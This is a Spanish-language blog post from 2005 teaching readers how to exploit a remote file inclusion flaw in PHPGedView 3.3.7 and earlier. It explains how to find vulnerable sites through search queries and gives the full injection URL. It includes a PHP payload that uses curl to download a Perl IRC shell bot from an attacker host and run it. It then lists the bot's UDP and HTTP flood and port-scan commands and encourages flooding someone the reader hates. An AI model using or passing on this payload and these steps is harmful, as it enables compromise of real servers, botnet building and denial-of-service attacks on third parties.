ecoestadistica.com

lunes, diciembre 26, 2005

Exploiting PHPGedView (<= 3.3.7)-Explicacion

Una nueva forma de explotar un simple bg basado en el advisore de RGOD (http://rgod.altervista.org) esta vez un fallo en PHPGedView <=3.3.7 versiones menores o iguales a 3.3.7...
No voy a explicar el fallo en si, si quieres leer el advisore completo leelo en esta direccion: http://www.securityfocus.com/archive/1/419906/30/0/threaded

Como buscar vulnerables?, pues googleando : "powered by PHPGedView", una vez localizada alguna web con este sistema lo primero que debemos hacer es crear en nuestro host un archivo con cualquier nombre y extension .txt ejemplo: bot.txt luego simplemente la forma de explotarlo seria: como ejemplo de web vulnerable: www.victima.com/phpgedview agregamos:
help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.hack.com/bot.txt nos quedaria algo asi:

http://www.victima.com/DIR_DEL_PHPGEDVIEW/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.hack.com/bot.txt

y en el archivo bot.txt ponemos este codigo:

?php
passthru("cd /tmp/;curl -o bot.txt http://www.hak.com/bot.txt; perl /tmp/bot.txt");
?

donde www.hack.com/bot.txt es nuestro bot configurado.
Lo que creamos es un archivo php con un llamado en este caso a curl (usaremos curl debido a que en la gran mayoria de los casos tenemos permisos de ejecucion, mas que usando el wget) que baja un archivo en este caso un shell bot y luego lo ejecuta.

Lo unico que tendriamos que cambiar es: http://www.hak.com/bot.txt por nuestra dir donde se encuentre el bot, el resto dejarlo asi como se encuentra.-

Podes bajar el bot en perl de AQUI
Cambiar unicamente el ADMIN SERVER CANAL y PUERTO nada mas, para darle instrucciones al bot hacemos: NOMBRE_DEL_BOT uname -a por ejemplo.-

Por que la necesidad de bajar bots? pues simple con el podemos ejecutar comando remotos en el servidor victima sin necesidad de dejar nuestra ip guardada, podemos ejecutar CUALQUIER comando solo con estas instrucciones:

Si el bot tiene nombre hack le diremos en el irc: hack uname -a y el bot nos dara la informacion del servidor tambien podemos ejecutar wget gcc etc etc eso se los dejo a su imaginacion, pero tambien tiene otras funciones... sabias que con 50 bots si realizas un UDP a alguien que odies no se levantara por unas cuantas horas? es lo poderoso de tener shellbots =)

Comandos: tomando en cuenta que el bot se llama hack

hack @udpflood PAQUETES TIEMPO (udp muy fuerte)

hack @httpflood PAQUETES TIEMPO (para servidores web)

hack @portscan IP (simple portscanner)

hack !nick NUEVO_NICK (cambia de nick)


y demas funciones que iras aprendiendo si revisas el codigo fuente

Salu2

ecoestadistica.com